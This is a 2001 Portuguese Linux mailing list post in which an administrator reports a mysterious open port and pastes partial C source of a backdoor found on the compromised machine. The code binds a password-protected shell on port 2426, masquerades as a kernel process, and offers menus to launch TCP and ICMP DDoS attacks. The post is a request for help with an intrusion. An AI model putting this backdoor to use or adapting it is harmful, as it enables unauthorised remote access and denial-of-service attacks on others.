Pessoal
Sem mais nem menos apareceu a porta 666 "doom" aberta no meu sistema...
alguém conhece esta porta?
Verifiquei no /etc/services e /etc/inetd.conf e está porta não consta...
Também achei alguns arquivos muito suspeitos no diretório /usr/tmp. Detalhe:
Ninguém tem acesso ao console(está em uma sala fechada) e os arquivos foram
criados num sábado a tarde, quando a empresa tb está fechada.
*bash
*ha
ha.c
Segue parte do prog: (Quem quiser o programa completo ou trocar informações,
contato ICQ 5934391)
---------------- ha.c ---------------------
#include <stdio.h>
...
/* definicoes */
#define PORTA 2426 /* porta que o backdoor bindar */
#define SENHA "msehaputaquepariu" /* oque acha de trocar isso aqui por sua
senha? */
#define DDOSDIR "/var/tmp/.mx" /* onde estao o icmpddos e o tcpddos */
/**************/
/* Buffer overflow no gets ()
descoberta por esc2 , na correcao foi usada uma funcao de nashleon */
#define maximo(x,y) ((x)>(y)?(x):(y)) /* aki estah */
#define SA struct sockaddr
#define DUNNO 5 /* i don't know hehehe...(eh pro listen() ;) */
#define MICROSOFT "SUCKS"
#define GRUPO "M"
#define EQUIPE "TecnoSis"
#define MAIL "[EMAIL PROTECTED]"
#define IRCSERVER "irc.brasnet.org"
#define NICK "PESTE-NEGRA"
int main(int argc, char **argv)
{
int sockfd, connfd,maxfd;
struct sockaddr_in servaddr;
char pass[256];
fd_set rset;
memset(argv[0], ' ', strlen(argv[0]));
strcpy(argv[0], "[kswapd]");
if (fork() != 0)
exit(0);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0);
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(PORTA);
servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
if (bind(sockfd, (SA *)&servaddr, sizeof(servaddr)) < 0);
if (listen(sockfd, DUNNO) < 0);
for (;;) {
if ( (connfd = accept(sockfd, (SA *)NULL, NULL)) < 0)
continue;
if (fork() != 0) {
dup2(connfd, STDIN_FILENO);
dup2(connfd, STDOUT_FILENO);
dup2(connfd, STDERR_FILENO);
close(connfd);
for (;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(STDERR_FILENO, &rset);
maxfd = maximo(fileno(stdin),STDERR_FILENO) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset))
{
bzero(pass, sizeof(pass));
fgets(pass, sizeof(pass) - 2, stdin);
if (!strncasecmp(pass, SENHA, strlen(SENHA))) {
bzero(&pass,sizeof(pass));
fprintf(stderr,"Senha aceita!\n");
chdir("/");
banner();
escolhas();
}
else {
close(STDERR_FILENO);
break;
}
}
}
exit(0);
}
close(connfd);
}
exit(0);
}
int banner()
{
fprintf(stderr,"\n");
fprintf(stderr,"\33[0;36m---------------------------------------------\n");
fprintf(stderr,"\33[0;1;34mV-Backdoor by PESTE\n");
fprintf(stderr,"\33[0;1;34mGrupo M - Equipe TecnoSis de Programacao\n");
fprintf(stderr,"\33[0;1;34mmail: [EMAIL PROTECTED]\n");
fprintf(stderr,"\33[0;36m---------------------------------------------\n\n\3
3[0m");
}
....
int ddos()
{
char ddos[1024];
fprintf(stderr,"\n\33[0;36m---------------------------------------------\n")
;
//fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34mComando DDoS:\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m - Os programas que podem ser usados sao o \n");
fprintf(stderr,"\33[0;1;34m TCPDDoS e o ICMPDDoS ou os dois juntos...\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m - Antes de comecar o ataque leia o README\n");
fprintf(stderr,"\33[0;1;34m do M-1...\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m OPCOES DE USO:\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m tcpddos - Usa o programa TCPDDoS.\n");
fprintf(stderr,"\33[0;1;34m icmpddos - Usa o programa ICMPDDoS.\n");
fprintf(stderr,"\33[0;1;34m todos - Usa todos os dois programas.\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m Nota: e necessario o programa no mesmo\n");
fprintf(stderr,"\33[0;36m---------------------------------------------\33[0m
\n\n");
fprintf(stderr,"\33[0;36mDDoS> \33[0;31m");
gets(ddos);
ddos[strlen(ddos) -1] = '\0';
if (strcmp("icmpddos", ddos) == 0) {
bzero(&ddos, sizeof(ddos));
icmpddos();
}
if (strcmp("tcpddos", ddos) == 0) {
bzero(&ddos, sizeof(ddos));
tcpddos();
}
if (strcmp("todos", ddos) == 0) {
bzero(&ddos, sizeof(ddos));
todosddos();
}
fprintf(stderr,"\n\n");
}
...
int ajuda()
{
fprintf(stderr,"\n\33[0;36m----------------------------------------------\n"
);
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34mComando ajuda:\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m shell - abre uma shell\n");
fprintf(stderr,"\33[0;1;34m proc - lista processos\n");
fprintf(stderr,"\33[0;1;34m ddos - faz ataque DDoS (M-1 requerido)\n");
fprintf(stderr,"\33[0;1;34m kill - 'mata' um processo\n");
fprintf(stderr,"\33[0;1;34m ajuda - Hm, oque sera este comando???\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;1;34m Nota: qualquer coisa que aconteca com
origem\n");
fprintf(stderr,"\33[0;1;34m deste programa, a responsabilidade e\n");
fprintf(stderr,"\33[0;1;34m completamente sua!!!\n");
fprintf(stderr,"\33[0;1;34m\n");
fprintf(stderr,"\33[0;36m----------------------------------------------\33[0
m\n\n");
}
Assinantes em 16/03/2001: 2216
Mensagens recebidas desde 07/01/1999: 104030
Historico e [des]cadastramento: http://linux-br.conectiva.com.br
Assuntos administrativos e problemas com a lista:
mailto:[EMAIL PROTECTED]
